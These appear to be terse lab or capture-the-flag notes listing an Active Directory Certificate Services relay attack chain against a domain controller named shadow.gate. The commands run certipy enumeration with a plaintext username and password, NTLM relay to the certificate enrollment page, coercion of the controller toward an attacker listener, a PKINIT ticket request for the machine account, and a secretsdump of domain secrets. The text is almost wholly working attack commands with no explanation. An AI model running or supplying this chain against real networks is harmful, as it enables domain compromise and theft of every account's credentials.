Hack. Eat. Sleep. Repeat!!!
certipy-ad -:certipy-ad find -u "jtrueblood" -p "blood_brothers" -dc-ip "10.1.57.249" -vulnerable -enabled
cat *.txt | grep "ESC"
impacket-ntlmrelayx-:impacket-ntlmrelayx -t http://10.1.57.249/certsrv/certfnsh.asp --adcs -smb2support --template KerberosAuthentication
nxc smb 10.1.57.249 -M coerce_plus -o LISTENER="10.200.88.20"
DC01$ receivedpkinttools-:python3 gettgtpkinit.py -cert-pfx DC01.shadow.gate.pfx -dc-ip 10.1.57.249 shadow.gate/dc01$ admin.ccache
impacket-secrets-dumpimpacket-secretsdump -k -no-pass dc01.shadow.gate